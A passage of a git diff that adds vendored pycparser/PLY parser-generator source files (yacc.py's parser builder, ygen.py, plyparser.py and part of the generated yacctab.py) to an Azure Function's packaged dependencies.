specified in function %r (ignored)', + file, line, func.__name__) + else: + try: + parsed_g = parse_grammar(doc, file, line) + for g in parsed_g: + grammar.append((name, g)) + except SyntaxError as e: + self.log.error(str(e)) + self.error = True + + # Looks like a valid grammar rule + # Mark the file in which defined. + self.modules.add(module) + + # Secondary validation step that looks for p_ definitions that are not functions + # or functions that look like they might be grammar rules. + + for n, v in self.pdict.items(): + if n.startswith('p_') and isinstance(v, (types.FunctionType, types.MethodType)): + continue + if n.startswith('t_'): + continue + if n.startswith('p_') and n != 'p_error': + self.log.warning('%r not defined as a function', n) + if ((isinstance(v, types.FunctionType) and v.__code__.co_argcount == 1) or + (isinstance(v, types.MethodType) and v.__func__.__code__.co_argcount == 2)): + if v.__doc__: + try: + doc = v.__doc__.split(' ') + if doc[1] == ':': + self.log.warning('%s:%d: Possible grammar rule %r defined without p_ prefix', + v.__code__.co_filename, v.__code__.co_firstlineno, n) + except IndexError: + pass + + self.grammar = grammar + +# ----------------------------------------------------------------------------- +# yacc(module) +# +# Build a parser +# ----------------------------------------------------------------------------- + +def yacc(method='LALR', debug=yaccdebug, module=None, tabmodule=tab_module, start=None, + check_recursion=True, optimize=False, write_tables=True, debugfile=debug_file, + outputdir=None, debuglog=None, errorlog=None, picklefile=None): + + if tabmodule is None: + tabmodule = tab_module + + # Reference to the parsing method of the last built parser + global parse + + # If pickling is enabled, table files are not created + if picklefile: + write_tables = 0 + + if errorlog is None: + errorlog = PlyLogger(sys.stderr) + + # Get the module dictionary used for the parser + if module: + _items = [(k, getattr(module, k)) for k in dir(module)] + pdict = dict(_items) + # If no __file__ attribute is available, try to obtain it from the __module__ instead + if '__file__' not in pdict: + pdict['__file__'] = sys.modules[pdict['__module__']].__file__ + else: + pdict = get_caller_module_dict(2) + + if outputdir is None: + # If no output directory is set, the location of the output files + # is determined according to the following rules: + # - If tabmodule specifies a package, files go into that package directory + # - Otherwise, files go in the same directory as the specifying module + if isinstance(tabmodule, types.ModuleType): + srcfile = tabmodule.__file__ + else: + if '.' not in tabmodule: + srcfile = pdict['__file__'] + else: + parts = tabmodule.split('.') + pkgname = '.'.join(parts[:-1]) + exec('import %s' % pkgname) + srcfile = getattr(sys.modules[pkgname], '__file__', '') + outputdir = os.path.dirname(srcfile) + + # Determine if the module is package of a package or not. + # If so, fix the tabmodule setting so that tables load correctly + pkg = pdict.get('__package__') + if pkg and isinstance(tabmodule, str): + if '.' not in tabmodule: + tabmodule = pkg + '.' + tabmodule + + + + # Set start symbol if it's specified directly using an argument + if start is not None: + pdict['start'] = start + + # Collect parser information from the dictionary + pinfo = ParserReflect(pdict, log=errorlog) + pinfo.get_all() + + if pinfo.error: + raise YaccError('Unable to build parser') + + # Check signature against table files (if any) + signature = pinfo.signature() + + # Read the tables + try: + lr = LRTable() + if picklefile: + read_signature = lr.read_pickle(picklefile) + else: + read_signature = lr.read_table(tabmodule) + if optimize or (read_signature == signature): + try: + lr.bind_callables(pinfo.pdict) + parser = LRParser(lr, pinfo.error_func) + parse = parser.parse + return parser + except Exception as e: + errorlog.warning('There was a problem loading the table file: %r', e) + except VersionError as e: + errorlog.warning(str(e)) + except ImportError: + pass + + if debuglog is None: + if debug: + try: + debuglog = PlyLogger(open(os.path.join(outputdir, debugfile), 'w')) + except IOError as e: + errorlog.warning("Couldn't open %r. %s" % (debugfile, e)) + debuglog = NullLogger() + else: + debuglog = NullLogger() + + debuglog.info('Created by PLY version %s (http://www.dabeaz.com/ply)', __version__) + + errors = False + + # Validate the parser information + if pinfo.validate_all(): + raise YaccError('Unable to build parser') + + if not pinfo.error_func: + errorlog.warning('no p_error() function is defined') + + # Create a grammar object + grammar = Grammar(pinfo.tokens) + + # Set precedence level for terminals + for term, assoc, level in pinfo.preclist: + try: + grammar.set_precedence(term, assoc, level) + except GrammarError as e: + errorlog.warning('%s', e) + + # Add productions to the grammar + for funcname, gram in pinfo.grammar: + file, line, prodname, syms = gram + try: + grammar.add_production(prodname, syms, funcname, file, line) + except GrammarError as e: + errorlog.error('%s', e) + errors = True + + # Set the grammar start symbols + try: + if start is None: + grammar.set_start(pinfo.start) + else: + grammar.set_start(start) + except GrammarError as e: + errorlog.error(str(e)) + errors = True + + if errors: + raise YaccError('Unable to build parser') + + # Verify the grammar structure + undefined_symbols = grammar.undefined_symbols() + for sym, prod in undefined_symbols: + errorlog.error('%s:%d: Symbol %r used, but not defined as a token or a rule', prod.file, prod.line, sym) + errors = True + + unused_terminals = grammar.unused_terminals() + if unused_terminals: + debuglog.info('') + debuglog.info('Unused terminals:') + debuglog.info('') + for term in unused_terminals: + errorlog.warning('Token %r defined, but not used', term) + debuglog.info(' %s', term) + + # Print out all productions to the debug log + if debug: + debuglog.info('') + debuglog.info('Grammar') + debuglog.info('') + for n, p in enumerate(grammar.Productions): + debuglog.info('Rule %-5d %s', n, p) + + # Find unused non-terminals + unused_rules = grammar.unused_rules() + for prod in unused_rules: + errorlog.warning('%s:%d: Rule %r defined, but not used', prod.file, prod.line, prod.name) + + if len(unused_terminals) == 1: + errorlog.warning('There is 1 unused token') + if len(unused_terminals) > 1: + errorlog.warning('There are %d unused tokens', len(unused_terminals)) + + if len(unused_rules) == 1: + errorlog.warning('There is 1 unused rule') + if len(unused_rules) > 1: + errorlog.warning('There are %d unused rules', len(unused_rules)) + + if debug: + debuglog.info('') + debuglog.info('Terminals, with rules where they appear') + debuglog.info('') + terms = list(grammar.Terminals) + terms.sort() + for term in terms: + debuglog.info('%-20s : %s', term, ' '.join([str(s) for s in grammar.Terminals[term]])) + + debuglog.info('') + debuglog.info('Nonterminals, with rules where they appear') + debuglog.info('') + nonterms = list(grammar.Nonterminals) + nonterms.sort() + for nonterm in nonterms: + debuglog.info('%-20s : %s', nonterm, ' '.join([str(s) for s in grammar.Nonterminals[nonterm]])) + debuglog.info('') + + if check_recursion: + unreachable = grammar.find_unreachable() + for u in unreachable: + errorlog.warning('Symbol %r is unreachable', u) + + infinite = grammar.infinite_cycles() + for inf in infinite: + errorlog.error('Infinite recursion detected for symbol %r', inf) + errors = True + + unused_prec = grammar.unused_precedence() + for term, assoc in unused_prec: + errorlog.error('Precedence rule %r defined for unknown symbol %r', assoc, term) + errors = True + + if errors: + raise YaccError('Unable to build parser') + + # Run the LRGeneratedTable on the grammar + if debug: + errorlog.debug('Generating %s tables', method) + + lr = LRGeneratedTable(grammar, method, debuglog) + + if debug: + num_sr = len(lr.sr_conflicts) + + # Report shift/reduce and reduce/reduce conflicts + if num_sr == 1: + errorlog.warning('1 shift/reduce conflict') + elif num_sr > 1: + errorlog.warning('%d shift/reduce conflicts', num_sr) + + num_rr = len(lr.rr_conflicts) + if num_rr == 1: + errorlog.warning('1 reduce/reduce conflict') + elif num_rr > 1: + errorlog.warning('%d reduce/reduce conflicts', num_rr) + + # Write out conflicts to the output file + if debug and (lr.sr_conflicts or lr.rr_conflicts): + debuglog.warning('') + debuglog.warning('Conflicts:') + debuglog.warning('') + + for state, tok, resolution in lr.sr_conflicts: + debuglog.warning('shift/reduce conflict for %s in state %d resolved as %s', tok, state, resolution) + + already_reported = set() + for state, rule, rejected in lr.rr_conflicts: + if (state, id(rule), id(rejected)) in already_reported: + continue + debuglog.warning('reduce/reduce conflict in state %d resolved using rule (%s)', state, rule) + debuglog.warning('rejected rule (%s) in state %d', rejected, state) + errorlog.warning('reduce/reduce conflict in state %d resolved using rule (%s)', state, rule) + errorlog.warning('rejected rule (%s) in state %d', rejected, state) + already_reported.add((state, id(rule), id(rejected))) + + warned_never = [] + for state, rule, rejected in lr.rr_conflicts: + if not rejected.reduced and (rejected not in warned_never): + debuglog.warning('Rule (%s) is never reduced', rejected) + errorlog.warning('Rule (%s) is never reduced', rejected) + warned_never.append(rejected) + + # Write the table file if requested + if write_tables: + try: + lr.write_table(tabmodule, outputdir, signature) + except IOError as e: + errorlog.warning("Couldn't create %r. %s" % (tabmodule, e)) + + # Write a pickled version of the tables + if picklefile: + try: + lr.pickle_table(picklefile, signature) + except IOError as e: + errorlog.warning("Couldn't create %r. %s" % (picklefile, e)) + + # Build the parser + lr.bind_callables(pinfo.pdict) + parser = LRParser(lr, pinfo.error_func) + + parse = parser.parse + return parser diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ygen.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ygen.py new file mode 100644 index 0000000..46c4c84 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/ply/ygen.py @@ -0,0 +1,74 @@ +# ply: ygen.py +# +# This is a support program that auto-generates different versions of the YACC parsing +# function with different features removed for the purposes of performance. +# +# Users should edit the method LParser.parsedebug() in yacc.py. The source code +# for that method is then used to create the other methods. See the comments in +# yacc.py for further details. + +import os.path +import shutil + +def get_source_range(lines, tag): + srclines = enumerate(lines) + start_tag = '#--! %s-start' % tag + end_tag = '#--! %s-end' % tag + + for start_index, line in srclines: + if line.strip().startswith(start_tag): + break + + for end_index, line in srclines: + if line.strip().endswith(end_tag): + break + + return (start_index + 1, end_index) + +def filter_section(lines, tag): + filtered_lines = [] + include = True + tag_text = '#--! %s' % tag + for line in lines: + if line.strip().startswith(tag_text): + include = not include + elif include: + filtered_lines.append(line) + return filtered_lines + +def main(): + dirname = os.path.dirname(__file__) + shutil.copy2(os.path.join(dirname, 'yacc.py'), os.path.join(dirname, 'yacc.py.bak')) + with open(os.path.join(dirname, 'yacc.py'), 'r') as f: + lines = f.readlines() + + parse_start, parse_end = get_source_range(lines, 'parsedebug') + parseopt_start, parseopt_end = get_source_range(lines, 'parseopt') + parseopt_notrack_start, parseopt_notrack_end = get_source_range(lines, 'parseopt-notrack') + + # Get the original source + orig_lines = lines[parse_start:parse_end] + + # Filter the DEBUG sections out + parseopt_lines = filter_section(orig_lines, 'DEBUG') + + # Filter the TRACKING sections out + parseopt_notrack_lines = filter_section(parseopt_lines, 'TRACKING') + + # Replace the parser source sections with updated versions + lines[parseopt_notrack_start:parseopt_notrack_end] = parseopt_notrack_lines + lines[parseopt_start:parseopt_end] = parseopt_lines + + lines = [line.rstrip()+'\n' for line in lines] + with open(os.path.join(dirname, 'yacc.py'), 'w') as f: + f.writelines(lines) + + print('Updated yacc.py') + +if __name__ == '__main__': + main() + + + + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/plyparser.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/plyparser.py new file mode 100644 index 0000000..9156c17 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/plyparser.py @@ -0,0 +1,133 @@ +#----------------------------------------------------------------- +# plyparser.py +# +# PLYParser class and other utilities for simplifying programming +# parsers with PLY +# +# Eli Bendersky [https://eli.thegreenplace.net/] +# License: BSD +#----------------------------------------------------------------- + +import warnings + +class Coord(object): + """ Coordinates of a syntactic element. Consists of: + - File name + - Line number + - (optional) column number, for the Lexer + """ + __slots__ = ('file', 'line', 'column', '__weakref__') + def __init__(self, file, line, column=None): + self.file = file + self.line = line + self.column = column + + def __str__(self): + str = "%s:%s" % (self.file, self.line) + if self.column: str += ":%s" % self.column + return str + + +class ParseError(Exception): pass + + +class PLYParser(object): + def _create_opt_rule(self, rulename): + """ Given a rule name, creates an optional ply.yacc rule + for it. The name of the optional rule is + _opt + """ + optname = rulename + '_opt' + + def optrule(self, p): + p[0] = p[1] + + optrule.__doc__ = '%s : empty\n| %s' % (optname, rulename) + optrule.__name__ = 'p_%s' % optname + setattr(self.__class__, optrule.__name__, optrule) + + def _coord(self, lineno, column=None): + return Coord( + file=self.clex.filename, + line=lineno, + column=column) + + def _token_coord(self, p, token_idx): + """ Returns the coordinates for the YaccProduction object 'p' indexed + with 'token_idx'. The coordinate includes the 'lineno' and + 'column'. Both follow the lex semantic, starting from 1. + """ + last_cr = p.lexer.lexer.lexdata.rfind('\n', 0, p.lexpos(token_idx)) + if last_cr < 0: + last_cr = -1 + column = (p.lexpos(token_idx) - (last_cr)) + return self._coord(p.lineno(token_idx), column) + + def _parse_error(self, msg, coord): + raise ParseError("%s: %s" % (coord, msg)) + + +def parameterized(*params): + """ Decorator to create parameterized rules. + + Parameterized rule methods must be named starting with 'p_' and contain + 'xxx', and their docstrings may contain 'xxx' and 'yyy'. These will be + replaced by the given parameter tuples. For example, ``p_xxx_rule()`` with + docstring 'xxx_rule : yyy' when decorated with + ``@parameterized(('id', 'ID'))`` produces ``p_id_rule()`` with the docstring + 'id_rule : ID'. Using multiple tuples produces multiple rules. + """ + def decorate(rule_func): + rule_func._params = params + return rule_func + return decorate + + +def template(cls): + """ Class decorator to generate rules from parameterized rule templates. + + See `parameterized` for more information on parameterized rules. + """ + issued_nodoc_warning = False + for attr_name in dir(cls): + if attr_name.startswith('p_'): + method = getattr(cls, attr_name) + if hasattr(method, '_params'): + # Remove the template method + delattr(cls, attr_name) + # Create parameterized rules from this method; only run this if + # the method has a docstring. This is to address an issue when + # pycparser's users are installed in -OO mode which strips + # docstrings away. + # See: https://github.com/eliben/pycparser/pull/198/ and + # https://github.com/eliben/pycparser/issues/197 + # for discussion. + if method.__doc__ is not None: + _create_param_rules(cls, method) + elif not issued_nodoc_warning: + warnings.warn( + 'parsing methods must have __doc__ for pycparser to work properly', + RuntimeWarning, + stacklevel=2) + issued_nodoc_warning = True + return cls + + +def _create_param_rules(cls, func): + """ Create ply.yacc rules based on a parameterized rule function + + Generates new methods (one per each pair of parameters) based on the + template rule function `func`, and attaches them to `cls`. The rule + function's parameters must be accessible via its `_params` attribute. + """ + for xxx, yyy in func._params: + # Use the template method's body for each new method + def param_rule(self, p): + func(self, p) + + # Substitute in the params for the grammar rule and function name + param_rule.__doc__ = func.__doc__.replace('xxx', xxx).replace('yyy', yyy) + param_rule.__name__ = func.__name__.replace('xxx', xxx) + + # Attach the new method to the class + setattr(cls, param_rule.__name__, param_rule) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/yacctab.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/yacctab.py new file mode 100644 index 0000000..31ad7fc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/pycparser/yacctab.py @@ -0,0 +1,366 @@ + +# yacctab.py +# This file is automatically generated. Do not edit. +_tabversion = '3.10' + +_lr_method = 'LALR' + +_lr_signature = 'translation_unit_or_emptyleftLORleftLANDleftORleftXORleftANDleftEQNEleftGTGELTLEleftRSHIFTLSHIFTleftPLUSMINUSleftTIMESDIVIDEMODAUTO BREAK CASE CHAR CONST CONTINUE DEFAULT DO DOUBLE ELSE ENUM EXTERN FLOAT FOR GOTO IF INLINE INT LONG REGISTER OFFSETOF RESTRICT RETURN SHORT SIGNED SIZEOF STATIC STRUCT SWITCH TYPEDEF UNION UNSIGNED VOID VOLATILE WHILE __INT128 _BOOL _COMPLEX _NORETURN _THREAD_LOCAL _STATIC_ASSERT _ATOMIC _ALIGNOF _ALIGNAS ID TYPEID INT_CONST_DEC INT_CONST_OCT INT_CONST_HEX INT_CONST_BIN INT_CONST_CHAR FLOAT_CONST HEX_FLOAT_CONST CHAR_CONST WCHAR_CONST U8CHAR_CONST U16CHAR_CONST U32CHAR_CONST STRING_LITERAL WSTRING_LITERAL U8STRING_LITERAL U16STRING_LITERAL U32STRING_LITERAL PLUS MINUS TIMES DIVIDE MOD OR AND NOT XOR LSHIFT RSHIFT LOR LAND LNOT LT LE GT GE EQ NE EQUALS TIMESEQUAL DIVEQUAL MODEQUAL PLUSEQUAL MINUSEQUAL LSHIFTEQUAL RSHIFTEQUAL ANDEQUAL XOREQUAL OREQUAL PLUSPLUS MINUSMINUS ARROW CONDOP LPAREN RPAREN LBRACKET RBRACKET LBRACE RBRACE COMMA PERIOD SEMI COLON ELLIPSIS PPHASH PPPRAGMA PPPRAGMASTRabstract_declarator_opt : empty\n| abstract_declaratorassignment_expression_opt : empty\n| assignment_expressionblock_item_list_opt : empty\n| block_item_listdeclaration_list_opt : empty\n| declaration_listdeclaration_specifiers_no_type_opt : empty\n| declaration_specifiers_no_typedesignation_opt : empty\n| designationexpression_opt : empty\n| expressionid_init_declarator_list_opt : empty\n| id_init_declarator_listidentifier_list_opt : empty\n| identifier_listinit_declarator_list_opt : empty\n| init_declarator_listinitializer_list_opt : empty\n| initializer_listparameter_type_list_opt : empty\n| parameter_type_liststruct_declarator_list_opt : empty\n| struct_declarator_listtype_qualifier_list_opt : empty\n| type_qualifier_list direct_id_declarator : ID\n direct_id_declarator : LPAREN id_declarator RPAREN\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_id_declarator : direct_id_declarator LPAREN parameter_type_list RPAREN\n | direct_id_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_declarator : TYPEID\n direct_typeid_declarator : LPAREN typeid_declarator RPAREN\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_noparen_declarator : TYPEID\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN\n id_declarator : direct_id_declarator\n id_declarator : pointer direct_id_declarator\n typeid_declarator : direct_typeid_declarator\n typeid_declarator : pointer direct_typeid_declarator\n typeid_noparen_declarator : direct_typeid_noparen_declarator\n typeid_noparen_declarator : pointer direct_typeid_noparen_declarator\n translation_unit_or_empty : translation_unit\n | empty\n translation_unit : external_declaration\n translation_unit : translation_unit external_declaration\n external_declaration : function_definition\n external_declaration : declaration\n external_declaration : pp_directive\n | pppragma_directive\n external_declaration : SEMI\n external_declaration : static_assert\n static_assert : _STATIC_ASSERT LPAREN constant_expression COMMA unified_string_literal RPAREN\n | _STATIC_ASSERT LPAREN constant_expression RPAREN\n pp_directive : PPHASH\n pppragma_directive : PPPRAGMA\n | PPPRAGMA PPPRAGMASTR\n function_definition : id_declarator declaration_list_opt compound_statement\n function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement\n statement : labeled_statement\n | expression_statement\n | compound_statement\n | selection_statement\n | iteration_statement\n | jump_statement\n | pppragma_directive\n | static_assert\n pragmacomp_or_statement : pppragma_directive statement\n | statement\n decl_body : declaration_specifiers init_declarator_list_opt\n | declaration_specifiers_no_type id_init_declarator_list_opt\n declaration : decl_body SEMI\n declaration_list : declaration\n | declaration_list declaration\n declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : atomic_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : alignment_specifier declaration_specifiers_no_type_opt\n declaration_specifiers : declaration_specifiers type_qualifier\n declaration_specifiers : declaration_specifiers storage_class_specifier\n declaration_specifiers : declaration_specifiers function_specifier\n declaration_specifiers : declaration_specifiers type_specifier_no_typeid\n declaration_specifiers : type_specifier\n declaration_specifiers : declaration_specifiers_no_type type_specifier\n declaration_specifiers : declaration_specifiers alignment_specifier\n storage_class_specifier : AUTO\n | REGISTER\n | STATIC\n | EXTERN\n | TYPEDEF\n | _THREAD_LOCAL\n function_specifier : INLINE\n | _NORETURN\n type_specifier_no_typeid : VOID\n | _BOOL\n | CHAR\n | SHORT\n | INT\n | LONG\n | FLOAT\n | DOUBLE\n | _COMPLEX\n | SIGNED\n | UNSIGNED\n | __INT128\n type_specifier : typedef_name\n | enum_specifier\n | struct_or_union_specifier\n | type_specifier_no_typeid\n | atomic_specifier\n atomic_specifier : _ATOMIC LPAREN type_name RPAREN\n type_qualifier : CONST\n | RESTRICT\n | VOLATILE\n | _ATOMIC\n init_declarator_list : init_declarator\n | init_declarator_list COMMA init_declarator\n init_declarator : declarator\n | declarator EQUALS initializer\n id_init_declarator_list : id_init_declarator\n | id_init_declarator_list COMMA init_declarator\n id_init_declarator : id_declarator\n | id_declarator EQUALS initializer\n specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid\n specifier_qualifier_list : specifier_qualifier_list type_qualifier\n specifier_qualifier_list : type_specifier\n specifier_qualifier_list : type_qualifier_list type_specifier\n specifier_qualifier_list : alignment_specifier\n specifier_qualifier_list : specifier_qualifier_list alignment_specifier\n struct_or_union_specifier : struct_or_union ID\n | struct_or_union TYPEID\n struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close\n | struct_or_union brace_open brace_close\n struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close\n | struct_or_union ID brace_open brace_close\n | struct_or_union TYPEID brace_open struct_declaration_list brace_close\n | struct_or_union TYPEID brace_open brace_close\n struct_or_union : STRUCT\n | UNION\n struct_declaration_list : struct_declaration\n | struct_declaration_list struct_declaration\n struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI\n struct_declaration : SEMI\n struct_declaration : pppragma_directive\n struct_declarator_list : struct_declarator\n | struct_declarator_list COMMA struct_declarator\n struct_declarator : declarator\n struct_declarator : declarator COLON constant_expression\n | COLON constant_expression\n enum_specifier : ENUM ID\n | ENUM TYPEID\n enum_specifier : ENUM brace_open enumerator_list brace_close\n enum_specifier : ENUM ID brace_open enumerator_list brace_close\n | ENUM TYPEID brace_open enumerator_list brace_close\n enumerator_list : enumerator\n | enumerator_list COMMA\n | enumerator_list COMMA enumerator\n alignment_specifier : _ALIGNAS LPAREN type_name RPAREN\n | _ALIGNAS LPAREN constant_expression RPAREN\n enumerator : ID\n | ID EQUALS constant_expression\n declarator : id_declarator\n | typeid_declarator\n pointer : TIMES type_qualifier_list_opt\n | TIMES type_qualifier_list_opt pointer\n type_qualifier_list : type_qualifier\n | type_qualifier_list type_qualifier\n parameter_type_list : parameter_list\n | parameter_list COMMA ELLIPSIS\n parameter_list : parameter_declaration\n | parameter_list COMMA parameter_declaration\n parameter_declaration : declaration_specifiers id_declarator\n | declaration_specifiers typeid_noparen_declarator\n parameter_declaration : declaration_specifiers abstract_declarator_opt\n identifier_list : identifier\n | identifier_list COMMA identifier\n initializer : assignment_expression\n initializer : brace_open initializer_list_opt brace_close\n | brace_open initializer_list COMMA brace_close\n initializer_list : designation_opt initializer\n | initializer_list COMMA designation_opt initializer\n designation : designator_list EQUALS\n designator_list : designator\n | designator_list designator\n designator : LBRACKET constant_expression RBRACKET\n | PERIOD identifier\n type_name : specifier_qualifier_list abstract_declarator_opt\n abstract_declarator : pointer\n abstract_declarator : pointer direct_abstract_declarator\n abstract_declarator : direct_abstract_declarator\n direct_abstract_declarator : LPAREN abstract_declarator RPAREN direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET\n direct_abstract_declarator : LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET\n direct_abstract_declarator : LBRACKET TIMES RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN\n direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN\n block_item : declaration\n | statement\n block_item_list : block_item\n | block_item_list block_item\n compound_statement : brace_open block_item_list_opt brace_close labeled_statement : ID COLON pragmacomp_or_statement labeled_statement : CASE constant_expression COLON pragmacomp_or_statement labeled_statement : DEFAULT COLON pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement jump_statement : GOTO ID SEMI jump_statement : BREAK SEMI jump_statement : CONTINUE SEMI jump_statement : RETURN expression SEMI\n | RETURN SEMI\n expression_statement : expression_opt SEMI expression : assignment_expression\n | expression COMMA assignment_expression\n assignment_expression : LPAREN compound_statement RPAREN typedef_name : TYPEID assignment_expression : conditional_expression\n | unary_expression assignment_operator assignment_expression\n assignment_operator : EQUALS\n | XOREQUAL\n | TIMESEQUAL\n | DIVEQUAL\n | MODEQUAL\n | PLUSEQUAL\n | MINUSEQUAL\n | LSHIFTEQUAL\n | RSHIFTEQUAL\n | ANDEQUAL\n | OREQUAL\n constant_expression : conditional_expression conditional_expression : binary_expression\n | binary_expression CONDOP expression COLON conditional_expression\n binary_expression : cast_expression\n | binary_expression TIMES binary_expression\n | binary_expression DIVIDE binary_expression\n | binary_expression MOD binary_expression\n | binary_expression PLUS binary_expression\n | binary_expression MINUS binary_expression\n | binary_expression RSHIFT binary_expression\n | binary_expression LSHIFT binary_expression\n | binary_expression LT binary_expression\n | binary_expression LE binary_expression\n | binary_expression GE binary_expression\n | binary_expression GT binary_expression\n | binary_expression EQ binary_expression\n | binary_expression NE binary_expression\n | binary_expression AND binary_expression\n | binary_expression OR binary_expression\n | binary_expression XOR binary_expression\n | binary_expression LAND binary_expression\n | binary_expression LOR binary_expression\n cast_expression : unary_expression cast_expression : LPAREN type_name RPAREN cast_expression unary_expression : postfix_expression unary_expression : PLUSPLUS unary_expression\n | MINUSMINUS unary_expression\n | unary_operator cast_expression\n unary_expression : SIZEOF unary_expression\n | SIZEOF LPAREN type_name RPAREN\n | _ALIGNOF LPAREN type_name RPAREN\n unary_operator : AND\n | TIMES\n | PLUS\n | MINUS\n | NOT\n | LNOT\n postfix_expression : primary_expression postfix_expression : postfix_expression LBRACKET expression RBRACKET postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN\n | postfix_expression LPAREN RPAREN\n postfix_expression : postfix_expression PERIOD ID\n | postfix_expression PERIOD TYPEID\n | postfix_expression ARROW ID\n | postfix_expression ARROW TYPEID\n postfix_expression : postfix_expression PLUSPLUS\n | postfix_expression MINUSMINUS\n postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close\n | LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close\n primary_expression : identifier primary_expression : constant primary_expression : unified_string_literal\n | unified_wstring_literal\n primary_expression : LPAREN expression RPAREN primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN\n offsetof_member_designator : identifier\n | offsetof_member_designator PERIOD identifier\n | offsetof_member_designator LBRACKET expression RBRACKET\n argument_expression_list : assignment_expression\n | argument_expression_list COMMA assignment_expression\n identifier : ID constant : INT_CONST_DEC\n | INT_CONST_OCT\n | INT_CONST_HEX\n | INT_CONST_BIN\n | INT_CONST_CHAR\n constant : FLOAT_CONST\n | HEX_FLOAT_CONST\n constant : CHAR_CONST\n | WCHAR_CONST\n | U8CHAR_CONST\n | U16CHAR_CONST\n | U32CHAR_CONST\n unified_string_literal : STRING_LITERAL\n | unified_string_literal STRING_LITERAL\n unified_wstring_literal : WSTRING_LITERAL\n | U8STRING_LITERAL\n | U16STRING_LITERAL\n | U32STRING_LITERAL\n | unified_wstring_literal WSTRING_LITERAL\n | unified_wstring_literal U8STRING_LITERAL\n | unified_wstring_literal U16STRING_LITERAL\n | unified_wstring_literal U32STRING_LITERAL\n brace_open : LBRACE\n brace_close : RBRACE\n empty : ' + +_lr_action_items = 